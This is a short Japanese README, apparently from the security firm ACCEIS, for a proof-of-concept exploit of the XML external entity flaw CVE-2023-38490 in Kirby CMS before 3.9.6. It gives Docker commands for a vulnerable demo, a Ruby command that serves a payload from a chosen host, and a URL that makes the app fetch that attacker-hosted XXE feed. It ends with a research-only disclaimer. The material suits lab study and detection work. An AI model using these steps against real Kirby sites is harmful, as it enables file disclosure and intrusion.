Kirby < 3.9.6 XML External Entity
CVE-2023-38490 / GHSA-q386-w6fg-gmgp のエクスプロイト
脆弱なデモアプリをビルドして実行:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
デモペイロードを提供:
注: docker コンテナがアクセスできるバインドアドレスを選択してください。
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
エクスプロイトを実行:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
脆弱な関数は Kirby Core に存在しますが、Kirby Core、Kirby StarterKit、Kirby PlainKit ではデフォルトでは使用されません。つまり、デフォルト設定では影響を受けませんが、カスタム開発や影響を受けるツールキットを使用するプラグインのインストールによって脆弱性が導入される可能性があります。
ACCEIS はいかなる違法行為も促進または奨励するものではありません。このリポジトリで提供されるすべてのコンテンツは、研究、教育、および脅威検出の目的のみを意図しています。